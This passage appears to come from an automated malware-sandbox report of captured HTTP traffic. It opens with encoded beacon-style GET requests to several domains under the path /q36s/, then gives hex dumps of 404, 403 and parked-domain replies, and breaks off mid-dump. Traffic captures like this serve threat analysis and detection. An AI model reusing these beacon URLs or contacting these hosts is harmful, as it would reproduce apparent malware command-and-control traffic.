Source: global traffic	HTTP traffic detected: GET /q36s/?1bGpqN=KaI0Rj3wcsIqg8Lge9r70qxIl2ZARFR6pw9QZ8eIk4lgB884W2uHm2Neex91t0JOAHKn&wFNT8=0jNDXxTXR8rtijfp HTTP/1.1Host: www.fraiuhs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /q36s/?1bGpqN=QZvQCpprdvdahDmS7NmKrSAADUyIV3QwKizJm0tHu4ylzR2u4nzvWcUcdlEm3O78XaNr&Vr=MBZl9ZMXj4u HTTP/1.1Host: www.flat-planet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /q36s/?1bGpqN=VigMRdHlcuoP+Sw3yuFwqC380HsjzcbE0b4n2u2ieXC1OCRINUCS2txvQYXeentP/kMQ&wFNT8=0jNDXxTXR8rtijfp HTTP/1.1Host: www.perfectselfstorageaston.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /q36s/?1bGpqN=u2o/mXnBhWEQf/pveWhGu62rKF+mK4qUp4dBBRZihtSbDfqqopE5TB84A5tdbEb+PdMV&wFNT8=0jNDXxTXR8rtijfp HTTP/1.1Host: www.computershit.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Wed, 09 Feb 2022 12:06:40 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Feb 2022 12:07:22 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Wed, 09 Feb 2022 12:07:49 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 39 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 96<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 09 Feb 2022 12:08:19 GMTContent-Type: text/htmlContent-Length: 275ETag: "61ffb800-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 837Connection: closeDate: Wed, 09 Feb 2022 12:08:24 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 4c 65 20 66 69 63 68 69 65 72 20 72 65 71 75 69 73 20 6e 27 61 20 70 61 73 20 26 65 61 63 75 74 65 3b 74 26 65 61 63 75 74 65 3b 20 74 72 6f 75 76 26 65 61 63 75 74 65 3b 2e 0a 49 6c 20 70 65 75 74 20 73 27 61 67 69 72 20 64 27 75 6e 65 20 65 72 72 65 75 72 20 74 65 63 68 6e 69 71 75 65 2e 20 56 65 75 69 6c 6c 65 7a 20 72 26 65 61 63 75 74 65 3b 65 73 73 61 79 65 72 20 75 6c 74 26 65 61 63 75 74 65 3b 72 69 65 75 72 65 6d 65 6e 74 2e 20 53 69 20 76 6f 75 73 20 6e 65 20 70 6f 75 76 65 7a 20 70 61 73 20 61 63 63 26 65 61 63 75 74 65 3b 64 65 72 20 61 75 20 66 69 63 68 69 65 72 20 61 70 72 26 65 67 72 61 76 65 3b 73 20 70 6c 75 73 69 65 75 72 73 20 74 65 6e 74 61 74 69 76 65 73 2c 20 63 65 6c 61 20 73 69 67 6e 69 66 69 65 20 71 75 27 69 6c 20 61 20 26 65 61 63 75 74 65 3b 74 26 65 61 63 75 74 65 3b 20 73 75 70 70 72 69 6d 26 65 61 63 75 74 65 3b 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta c
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Feb 2022 12:08:34 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 277Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 66 72 61 69 75 68 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.fraiuhs.com Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Feb 2022 12:09:09 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Feb 2022 12:09:10 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Feb 2022 12:09:10 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 